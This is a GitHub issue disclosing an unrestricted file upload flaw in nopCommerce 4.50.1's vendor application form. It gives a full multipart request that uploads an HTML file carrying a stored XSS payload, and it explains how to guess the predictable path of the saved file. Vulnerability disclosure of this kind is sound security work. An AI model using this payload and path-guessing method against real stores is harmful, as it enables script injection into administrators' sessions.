Skip to content

Unrestricted File Upload in Apply for vendor account feature #6192

Closed
@trungtin1998

Description

nopCommerce version: 4.50.1

Steps to reproduce the problem:

  • At Apply for vendor account feature, customer could upload arbitrary file, for example file script.html and content of submitted form as below:
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="Name"

pentester
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="Email"

phamtrungtintf1512@gmail.com
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="Description"

Unrestricted File Upload in Apply for vendor account feature
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="uploadedFile"; filename="script.html"
Content-Type: text/html

<h1>Testing upload file by TF1T<img src=x onerror=alert(document.domain)></h1>
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="apply-vendor"


-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="__RequestVerificationToken"

CfDJ8PCrMQQMCTdOtvWnrq2WpITJLfTjickNjSm_qcSluUiK-_7c-VbzzTCok-M1duwMopvVKCMTy1GmrmTtQnch6SHfSXemzptzz2nOOP8uW4X6qGD2Z-1lPLct2WQrWDBY1qV5aGgzwe2T_2BneJo-5FzzMeW1b0o9epdkZ_hZpu-4UqN6zwTaxYTx-gFvJBoFaw
-----------------------------353170076619137176562598160618--
  • After admin see Vendor apply info by clicking Edit button, uploaded file will be generated and the final uploaded file has formatted /images/thumbs/{id-Vendor.Name-100.Content-Type-extension}
    vendor_list
    • id parameter is 7 digits number and it is auto increment, therefore it is easy to guess/bruteforce
    • User Input Vendor.Name will be filtered special character, therefore, I just put alphabet characters here to make output unchange
    • Content-Type is text/html => Content-Type-extension is html.
  • One of my final uploaded file is https://IP/images/thumbs/0000108_pentester_100.html
    Impact: Unrestricted File Upload in Apply for vendor account feature leading to Stored XSS
    Unrestricted_file_upload-vendor_apply_XSS

Metadata

Assignees

Labels

Projects

No projects

Milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions